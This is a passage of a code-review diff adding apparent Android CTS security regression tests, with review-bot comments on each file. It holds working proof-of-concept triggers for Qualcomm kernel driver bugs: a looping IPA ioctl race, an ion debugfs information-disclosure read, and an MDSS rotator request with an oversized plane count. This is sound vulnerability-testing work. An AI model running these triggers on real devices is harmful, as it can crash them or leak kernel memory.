+enum teth_aggr_protocol_type {
+ TETH_AGGR_PROTOCOL_NONE,
+ TETH_AGGR_PROTOCOL_MBIM,
+ TETH_AGGR_PROTOCOL_TLP,
+ TETH_AGGR_PROTOCOL_MAX,
+};
+
+/**
+ * struct teth_aggr_params_link - Aggregation parameters for uplink/downlink
+ * @aggr_prot: Aggregation protocol (MBIM / TLP)
+ * @max_transfer_size_byte: Maximal size of aggregated packet in bytes.
+ * Default value is 16*1024.
+ * @max_datagrams: Maximal number of IP packets in an aggregated
+ * packet. Default value is 16
+ */
+struct teth_aggr_params_link {
+ enum teth_aggr_protocol_type aggr_prot;
+ uint32_t max_transfer_size_byte;
+ uint32_t max_datagrams;
+};
+
+
+/**
+ * struct teth_aggr_params - Aggregation parmeters
+ * @ul: Uplink parameters
+ * @dl: Downlink parmaeters
+ */
+struct teth_aggr_params {
+ struct teth_aggr_params_link ul;
+ struct teth_aggr_params_link dl;
+};
+
+/**
+ * struct teth_aggr_capabilities - Aggregation capabilities
+ * @num_protocols: Number of protocols described in the array
+ * @prot_caps[]: Array of aggregation capabilities per protocol
+ */
+struct teth_aggr_capabilities {
+ uint16_t num_protocols;
+ struct teth_aggr_params_link prot_caps[0];
+};
+
+/**
+ * struct teth_ioc_set_bridge_mode
+ * @link_protocol: link protocol (IP / Ethernet)
+ * @lcid: logical channel number
+ */
+struct teth_ioc_set_bridge_mode {
+ enum teth_link_protocol_type link_protocol;
+ uint16_t lcid;
+};
+
+/**
+ * struct teth_ioc_set_aggr_params
+ * @aggr_params: Aggregation parmeters
+ * @lcid: logical channel number
+ */
+struct teth_ioc_aggr_params {
+ struct teth_aggr_params aggr_params;
+ uint16_t lcid;
+};
+
+
+#define TETH_BRIDGE_IOC_SET_BRIDGE_MODE _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE, \
+ struct teth_ioc_set_bridge_mode *)
+#define TETH_BRIDGE_IOC_SET_AGGR_PARAMS _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_PARAMS _IOR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_CAPABILITIES _IOWR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES, \
+ struct teth_aggr_capabilities *)
+
+/*
+ * unique magic number of the ODU bridge ioctls
+ */
+#define ODU_BRIDGE_IOC_MAGIC 0xCD
+
+/*
+ * Ioctls supported by ODU bridge driver
+ */
+#define ODU_BRIDGE_IOCTL_SET_MODE 0
+#define ODU_BRIDGE_IOCTL_SET_LLV6_ADDR 1
+#define ODU_BRIDGE_IOCTL_MAX 2
+
+/**
+ * enum odu_bridge_mode - bridge mode
+ * (ROUTER MODE / BRIDGE MODE)
+ */
+enum odu_bridge_mode {
+ ODU_BRIDGE_MODE_ROUTER,
+ ODU_BRIDGE_MODE_BRIDGE,
+ ODU_BRIDGE_MODE_MAX,
+};
+
+#define ODU_BRIDGE_IOC_SET_MODE _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_MODE, \
+ enum odu_bridge_mode)
+
+#define ODU_BRIDGE_IOC_SET_LLV6_ADDR _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_LLV6_ADDR, \
+ struct in6_addr *)
+
+#endif /* _UAPI_MSM_IPA_H_ */
diff --git a/hostsidetests/security/securityPatch/Bug-35048450/poc.cpp b/hostsidetests/security/securityPatch/Bug-35048450/poc.cpp
new file mode 100644
index 0000000..aa9410f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35048450/poc.cpp
@@ -0,0 +1,64 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+*/
+
+
+#define _GNU_SOURCE
+
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include "local_poc.h"
+#include <unistd.h>
+#include <stdio.h>
+
+struct ipa_ioc_query_intf_rx_props_2 {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_rx_props;
+ struct ipa_ioc_rx_intf_prop rx[2];
+};
+int main() {
+
+ int fd = open("/dev/ipa", O_RDWR);
+
+ struct ipa_ioc_query_intf query_intf;
+ strlcpy(&(query_intf.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+
+ int result = ioctl(fd, IPA_IOC_QUERY_INTF, &query_intf);
+
+ ipa_ioc_query_intf_rx_props_2 rx_props_2;
+ memset(&rx_props_2, 0, sizeof(rx_props_2));
+ strlcpy(&(rx_props_2.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ rx_props_2.num_rx_props = 2;
+
+ int result2 = ioctl(fd, IPA_IOC_QUERY_INTF_RX_PROPS, &rx_props_2);
+
+ while (true) {
+ ipa_ioc_query_intf_rx_props rx_props;
+ memset(&rx_props, 0, sizeof(rx_props));
+ strlcpy(&(rx_props.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ rx_props.num_rx_props = 0;
+
+ int result3 = ioctl(fd, IPA_IOC_QUERY_INTF_RX_PROPS, &rx_props);
+
+ usleep(10000);
+ }
+ return 0;
+}
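Review bot: The result of `open("/dev/ipa", O_RDWR)` is never checked, so on a device without this node (or where SELinux denies it) the `while (true)` loop keeps calling `ioctl()` on `-1` until the harness kills the process. A guard such as `if (fd < 0) { return -1; }` right after the open avoids that; which exit status the host-side test expects is not visible here. `query_intf` is also the only one of the three request structs that is not zeroed before use, so `memset(&query_intf, 0, sizeof(query_intf));` would keep uninitialised stack bytes out of the ioctl argument. The loop has no bound, which leaves `return 0;` unreachable and `fd` never closed, and `result`, `result2` and `result3` are assigned but never read.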
diff --git a/hostsidetests/security/securityPatch/Bug-35644815/Android.mk b/hostsidetests/security/securityPatch/Bug-35644815/Android.mk
new file mode 100644
index 0000000..1dd2950
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35644815/Android.mk
@@ -0,0 +1,35 @@
+#Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+ include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35644815
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
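Review bot: The warning and hardening flags on the four `CFLAGS +=` lines, and `-rdynamic` on `LDFLAGS +=`, are most likely not applied to this module, because the Android make build takes per-module flags from `LOCAL_CFLAGS` and `LOCAL_LDFLAGS` (as the `LOCAL_LDFLAGS += -fPIE -pie` line already does). Writing them as `LOCAL_CFLAGS += -Wall -W -g -O2 ...` would make `-Wall` and `-D_FORTIFY_SOURCE=2` take effect for the test binary, and `-Iinclude` belongs in `LOCAL_C_INCLUDES`. The same lines appear in the Android.mk files added for Bug-35950388 and Bug-36266767 in this change. The stray space before `include $(CLEAR_VARS)` and the missing space in `#Copyright` are cosmetic but worth tidying.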
diff --git a/hostsidetests/security/securityPatch/Bug-35644815/poc.c b/hostsidetests/security/securityPatch/Bug-35644815/poc.c
new file mode 100644
index 0000000..d3482e0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35644815/poc.c
@@ -0,0 +1,130 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+// for opendir / readdir
+#include <dirent.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) \
+ printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+static int set_affinity(int num) {
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if (ret == -1) {
+ ERR("[-] set affinity failed");
+ }
+ return ret;
+}
+
+struct ion_debugfs_handle_header {
+ unsigned int version;
+};
+
+struct ion_debugfs_handle_entry {
+ unsigned int heap_id;
+ size_t size;
+ unsigned int flags;
+ unsigned int handle_count;
+ size_t mapped_size;
+};
+
+struct ion_debugfs_handle {
+ struct ion_debugfs_handle_header hdr;
+ struct ion_debugfs_handle_entry entry;
+};
+
+#define TARGET "/sys/kernel/debug/ion/clients/pids/"
+int main(int argc, char *argv[]) {
+ int i, ret, tmpfd;
+ ssize_t rr;
+ char buf[PAGE_SIZE] = {0}, *p;
+ DIR *dir;
+ struct dirent *ent;
+ struct ion_debugfs_handle_header hdr = {0};
+ struct ion_debugfs_handle_entry entry = {0};
+ struct ion_debugfs_handle handle = {0};
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ dir = opendir(TARGET);
+ if (dir == NULL) {
+ ERR("[-] opendir %s failed", TARGET);
+ return -1;
+ }
+
+ while (ent = readdir(dir)) {
+ if (ent->d_type != DT_REG) {
+ continue;
+ }
+
+ memset(buf, 0, PAGE_SIZE);
+ snprintf(buf, PAGE_SIZE, "%s%s", TARGET, ent->d_name);
+
+ tmpfd = open(buf, O_RDWR);
+
+ if (tmpfd == -1) {
+ continue;
+ }
+
+ rr = read(tmpfd, &hdr, sizeof(hdr));
+
+ for (;;) {
+ rr = read(tmpfd, &entry, sizeof(entry));
+ if (rr == 0) {
+ break;
+ }
+
+ if (rr != sizeof(entry)) {
+ break;
+ }
+
+ p = (char *)&entry;
+ p += sizeof(int);
+ printf("INFO DISC FLAG: ");
+ for (i = 0; i < sizeof(int); i++) {
+ printf("%x", p[i]);
+ }
+ }
+ close(tmpfd);
+ }
+ closedir(dir);
+ return 0;
+}
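Review bot: The byte dump in the inner loop prints `p[i]` from a plain `char` through `%x`, so a byte with the high bit set is sign-extended on targets where `char` is signed and a small byte loses its leading zero, which makes the text after `INFO DISC FLAG: ` ambiguous to parse; `printf("%02x", (unsigned char)p[i]);` fixes both. The marker is printed for every entry read regardless of the byte values, and `p += sizeof(int)` lands on alignment padding only where `size_t` is 8 bytes (in the 32-bit build it presumably points at `size`), so the host-side check, which is not visible here, needs more than the marker to separate a leak from a normal value. The return value of the header `read()` is overwritten without being checked, `while (ent = readdir(dir))` wants a second pair of parentheses, `i < sizeof(int)` compares signed with unsigned, and `ret`, `handle`, `argc` and `argv` are unused.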
diff --git a/hostsidetests/security/securityPatch/Bug-35950388/Android.mk b/hostsidetests/security/securityPatch/Bug-35950388/Android.mk
new file mode 100644
index 0000000..824e86f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35950388/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35950388
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+LOCAL_C_INCLUDES += include
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-35950388/local_poc.h b/hostsidetests/security/securityPatch/Bug-35950388/local_poc.h
new file mode 100644
index 0000000..b96e307
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35950388/local_poc.h
@@ -0,0 +1,335 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+
+#ifndef __CMD_H__
+#define __CMD_H__
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+/*
+ * Let any architecture override either of the following before
+ * including this file.
+ */
+
+#ifndef _IOC_SIZEBITS
+# define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+# define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS)-1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS)-1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS)-1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS)-1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT+_IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT+_IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT+_IOC_SIZEBITS)
+
+/*
+ * Direction bits, which any architecture can choose to override
+ * before including this file.
+ */
+
+#ifndef _IOC_NONE
+# define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+# define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+# define _IOC_READ 2U
+#endif
+
+
+
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#define _IOC(dir,type,nr,size) \
+ (((dir) << _IOC_DIRSHIFT) | \
+ ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | \
+ ((size) << _IOC_SIZESHIFT))
+
+
+
+/* used to create numbers */
+#define _IO(type,nr) _IOC(_IOC_NONE,(type),(nr),0)
+#define _IOR(type,nr,size) _IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOW(type,nr,size) _IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOWR(type,nr,size) _IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+
+
+
+struct mult_factor {
+ uint32_t numer;
+ uint32_t denom;
+};
+
+struct mdp_rotation_buf_info {
+ uint32_t width;
+ uint32_t height;
+ uint32_t format;
+ struct mult_factor comp_ratio;
+};
+
+struct mdp_rotation_config {
+ uint32_t version;
+ uint32_t session_id;
+ struct mdp_rotation_buf_info input;
+ struct mdp_rotation_buf_info output;
+ uint32_t frame_rate;
+ uint32_t flags;
+ uint32_t reserved[6];
+};
+
+
+struct mdp_rect {
+ uint32_t x;
+ uint32_t y;
+ uint32_t w;
+ uint32_t h;
+};
+
+
+
+
+struct mdp_layer_plane {
+ /* DMA buffer file descriptor information. */
+ int fd;
+
+ /* Pixel offset in the dma buffer. */
+ uint32_t offset;
+
+ /* Number of bytes in one scan line including padding bytes. */
+ uint32_t stride;
+};
+
+#define MAX_PLANES 4
+
+
+struct mdp_layer_buffer {
+ /* layer width in pixels. */
+ uint32_t width;
+
+ /* layer height in pixels. */
+ uint32_t height;
+
+ /*
+ * layer format in DRM-style fourcc, refer drm_fourcc.h for
+ * standard formats
+ */
+ uint32_t format;
+
+ /* plane to hold the fd, offset, etc for all color components */
+ struct mdp_layer_plane planes[MAX_PLANES];
+
+ /* valid planes count in layer planes list */
+ uint32_t plane_count;
+
+ /* compression ratio factor, value depends on the pixel format */
+ struct mult_factor comp_ratio;
+
+ /*
+ * SyncFence associated with this buffer. It is used in two ways.
+ *
+ * 1. Driver waits to consume the buffer till producer signals in case
+ * of primary and external display.
+ *
+ * 2. Writeback device uses buffer structure for output buffer where
+ * driver is producer. However, client sends the fence with buffer to
+ * indicate that consumer is still using the buffer and it is not ready
+ * for new content.
+ */
+ int fence;
+
+ /* 32bits reserved value for future usage. */
+ uint32_t reserved;
+};
+
+
+struct mdp_rotation_item {
+ /* rotation request flag */
+ uint32_t flags;
+
+ /* Source crop rectangle */
+ struct mdp_rect src_rect;
+
+ /* Destination rectangle */
+ struct mdp_rect dst_rect;
+
+ /* Input buffer for the request */
+ struct mdp_layer_buffer input;
+
+ /* The output buffer for the request */
+ struct mdp_layer_buffer output;
+
+ /*
+ * DMA pipe selection for this request by client:
+ * 0: DMA pipe 0
+ * 1: DMA pipe 1
+ * or MDSS_ROTATION_HW_ANY if client wants
+ * driver to allocate any that is available
+ */
+ uint32_t pipe_idx;
+
+ /*
+ * Write-back block selection for this request by client:
+ * 0: Write-back block 0
+ * 1: Write-back block 1
+ * or MDSS_ROTATION_HW_ANY if client wants
+ * driver to allocate any that is available
+ */
+ uint32_t wb_idx;
+
+ /* Which session ID is this request scheduled on */
+ uint32_t session_id;
+
+ /* 32bits reserved value for future usage */
+ uint32_t reserved[6];
+};
+
+struct mdp_rotation_request {
+ /* 32bit version indicates the request structure */
+ uint32_t version;
+
+ uint32_t flags;
+
+ /* Number of rotation request items in the list */
+ uint32_t count;
+
+ /* Pointer to a list of rotation request items */
+ struct mdp_rotation_item __user *list;
+
+ /* 32bits reserved value for future usage*/
+ uint32_t reserved[6];
+};
+
+#define MDSS_ROTATOR_IOCTL_MAGIC 'w'
+
+/* open a rotation session */
+#define MDSS_ROTATION_OPEN \
+ _IOWR(MDSS_ROTATOR_IOCTL_MAGIC, 1, struct mdp_rotation_config *)
+
+/* change the rotation session configuration */
+#define MDSS_ROTATION_CONFIG \
+ _IOWR(MDSS_ROTATOR_IOCTL_MAGIC, 2, struct mdp_rotation_config *)
+
+/* queue the rotation request */
+#define MDSS_ROTATION_REQUEST \
+ _IOWR(MDSS_ROTATOR_IOCTL_MAGIC, 3, struct mdp_rotation_request *)
+
+/* close a rotation session with the specified rotation session ID */
+#define MDSS_ROTATION_CLOSE _IOW(MDSS_ROTATOR_IOCTL_MAGIC, 4, unsigned int)
+
+
+
+
+#define MDP_IMGTYPE_END 0x100
+#define MDP_IMGTYPE2_START 0x10000
+
+enum {
+ MDP_RGB_565, /* RGB 565 planer */
+ MDP_XRGB_8888, /* RGB 888 padded */
+ MDP_Y_CBCR_H2V2, /* Y and CbCr, pseudo planer w/ Cb is in MSB */
+ MDP_Y_CBCR_H2V2_ADRENO,
+ MDP_ARGB_8888, /* ARGB 888 */
+ MDP_RGB_888, /* RGB 888 planer */
+ MDP_Y_CRCB_H2V2, /* Y and CrCb, pseudo planer w/ Cr is in MSB */
+ MDP_YCRYCB_H2V1, /* YCrYCb interleave */
+ MDP_CBYCRY_H2V1, /* CbYCrY interleave */
+ MDP_Y_CRCB_H2V1, /* Y and CrCb, pseduo planer w/ Cr is in MSB */
+ MDP_Y_CBCR_H2V1, /* Y and CrCb, pseduo planer w/ Cr is in MSB */
+ MDP_Y_CRCB_H1V2,
+ MDP_Y_CBCR_H1V2,
+ MDP_RGBA_8888, /* ARGB 888 */
+ MDP_BGRA_8888, /* ABGR 888 */
+ MDP_RGBX_8888, /* RGBX 888 */
+ MDP_Y_CRCB_H2V2_TILE, /* Y and CrCb, pseudo planer tile */
+ MDP_Y_CBCR_H2V2_TILE, /* Y and CbCr, pseudo planer tile */
+ MDP_Y_CR_CB_H2V2, /* Y, Cr and Cb, planar */
+ MDP_Y_CR_CB_GH2V2, /* Y, Cr and Cb, planar aligned to Android YV12 */
+ MDP_Y_CB_CR_H2V2, /* Y, Cb and Cr, planar */
+ MDP_Y_CRCB_H1V1, /* Y and CrCb, pseduo planer w/ Cr is in MSB */
+ MDP_Y_CBCR_H1V1, /* Y and CbCr, pseduo planer w/ Cb is in MSB */
+ MDP_YCRCB_H1V1, /* YCrCb interleave */
+ MDP_YCBCR_H1V1, /* YCbCr interleave */
+ MDP_BGR_565, /* BGR 565 planer */
+ MDP_BGR_888, /* BGR 888 */
+ MDP_Y_CBCR_H2V2_VENUS,
+ MDP_BGRX_8888, /* BGRX 8888 */
+ MDP_RGBA_8888_TILE, /* RGBA 8888 in tile format */
+ MDP_ARGB_8888_TILE, /* ARGB 8888 in tile format */
+ MDP_ABGR_8888_TILE, /* ABGR 8888 in tile format */
+ MDP_BGRA_8888_TILE, /* BGRA 8888 in tile format */
+ MDP_RGBX_8888_TILE, /* RGBX 8888 in tile format */
+ MDP_XRGB_8888_TILE, /* XRGB 8888 in tile format */
+ MDP_XBGR_8888_TILE, /* XBGR 8888 in tile format */
+ MDP_BGRX_8888_TILE, /* BGRX 8888 in tile format */
+ MDP_YCBYCR_H2V1, /* YCbYCr interleave */
+ MDP_RGB_565_TILE, /* RGB 565 in tile format */
+ MDP_BGR_565_TILE, /* BGR 565 in tile format */
+ MDP_ARGB_1555, /*ARGB 1555*/
+ MDP_RGBA_5551, /*RGBA 5551*/
+ MDP_ARGB_4444, /*ARGB 4444*/
+ MDP_RGBA_4444, /*RGBA 4444*/
+ MDP_RGB_565_UBWC,
+ MDP_RGBA_8888_UBWC,
+ MDP_Y_CBCR_H2V2_UBWC,
+ MDP_RGBX_8888_UBWC,
+ MDP_Y_CRCB_H2V2_VENUS,
+ MDP_IMGTYPE_LIMIT,
+ MDP_RGB_BORDERFILL, /* border fill pipe */
+ MDP_XRGB_1555,
+ MDP_RGBX_5551,
+ MDP_XRGB_4444,
+ MDP_RGBX_4444,
+ MDP_ABGR_1555,
+ MDP_BGRA_5551,
+ MDP_XBGR_1555,
+ MDP_BGRX_5551,
+ MDP_ABGR_4444,
+ MDP_BGRA_4444,
+ MDP_XBGR_4444,
+ MDP_BGRX_4444,
+ MDP_ABGR_8888,
+ MDP_XBGR_8888,
+ MDP_RGBA_1010102,
+ MDP_ARGB_2101010,
+ MDP_RGBX_1010102,
+ MDP_XRGB_2101010,
+ MDP_BGRA_1010102,
+ MDP_ABGR_2101010,
+ MDP_BGRX_1010102,
+ MDP_XBGR_2101010,
+ MDP_RGBA_1010102_UBWC,
+ MDP_RGBX_1010102_UBWC,
+ MDP_Y_CBCR_H2V2_P010,
+ MDP_Y_CBCR_H2V2_TP10_UBWC,
+ MDP_CRYCBY_H2V1, /* CrYCbY interleave */
+ MDP_IMGTYPE_LIMIT1 = MDP_IMGTYPE_END,
+ MDP_FB_FORMAT = MDP_IMGTYPE2_START, /* framebuffer format */
+ MDP_IMGTYPE_LIMIT2 /* Non valid image type after this enum */
+};
+
+#endif
+
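Review bot: This header is not self-contained: it uses `uint32_t` without `#include <stdint.h>` and `__user` without defining it, so it compiles only because of what poc.c happens to include before it. It also re-defines `_IOC_NRBITS`, `_IOC`, `_IO`, `_IOR`, `_IOW` and `_IOWR` unconditionally, which can clash with the definitions from `<sys/ioctl.h>` that poc.c includes first. I would replace the copied `_IOC*` block with `#include <sys/ioctl.h>`, add `#include <stdint.h>`, and guard the annotation with `#ifndef __user` / `#define __user` / `#endif`. The guard name `__CMD_H__` is both a reserved identifier and generic enough to collide, so something specific to this test directory would be safer.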
diff --git a/hostsidetests/security/securityPatch/Bug-35950388/poc.c b/hostsidetests/security/securityPatch/Bug-35950388/poc.c
new file mode 100644
index 0000000..c084a47
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35950388/poc.c
@@ -0,0 +1,95 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+
+#define GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/ion.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include "local_poc.h"
+
+int fd;
+int id;
+
+int main(int argc, char **argv) {
+ int ret, i, count;
+ struct mdp_rotation_request req;
+ struct mdp_rotation_item item;
+
+ struct mdp_rotation_config config;
+
+ fd = open("/dev/mdss_rotator", O_RDONLY, 0);
+ if (fd < 0) {
+ return -1;
+ }
+
+ config.input.format = MDP_Y_CBCR_H2V2;
+ config.output.format = MDP_Y_CBCR_H2V2;
+ config.input.height = 4;
+ config.input.width = 4;
+ config.output.height = 4;
+ config.output.width = 4;
+ config.flags = 0;
+ ret = ioctl(fd, MDSS_ROTATION_OPEN, &config);
+ if (ret < 0) {
+ goto failed;
+ } else {
+ id = config.session_id;
+ }
+
+ item.wb_idx = 0xFFFFFFFF;
+ item.pipe_idx = item.wb_idx;
+ item.session_id = id;
+
+ item.src_rect.w = config.input.width;
+ item.src_rect.h = config.input.height;
+ item.input.format = config.input.format;
+
+ item.dst_rect.w = config.output.width;
+ item.dst_rect.h = config.output.height;
+ item.output.format = config.output.format;
+
+ item.src_rect.x = 1;
+ item.src_rect.y = 1;
+ item.dst_rect.x = 1;
+ item.dst_rect.y = 1;
+
+ item.input.width = 8;
+ item.input.height = 8;
+ item.output.height = 8;
+ item.output.width = 8;
+
+ item.input.plane_count = 0x0000FFFF;
+ req.count = 1;
+ req.list = &item;
+ req.flags = 0;
+ ret = ioctl(fd, MDSS_ROTATION_REQUEST, &req);
+
+ failed:
+ close(fd);
+
+ return 0;
+}
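Review bot: `config`, `item` and `req` are stack variables with only some fields assigned before they are handed to `ioctl()`, so `config.version`, `item.flags`, the `planes` arrays, `req.version` and the `reserved` fields carry whatever was on the stack and the test result can vary from run to run. Zeroing them first, `memset(&config, 0, sizeof(config)); memset(&item, 0, sizeof(item)); memset(&req, 0, sizeof(req));`, makes the request deterministic. `#define GNU_SOURCE` is missing its leading underscore and has no effect as written; it should be `#define _GNU_SOURCE`. The result of the `MDSS_ROTATION_REQUEST` ioctl is stored in `ret` but never examined, `main` returns 0 on every path after the open, and `i` and `count` are unused.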
diff --git a/hostsidetests/security/securityPatch/Bug-36266767/Android.mk b/hostsidetests/security/securityPatch/Bug-36266767/Android.mk
new file mode 100644
index 0000000..2a1edd0
--- /dev/null
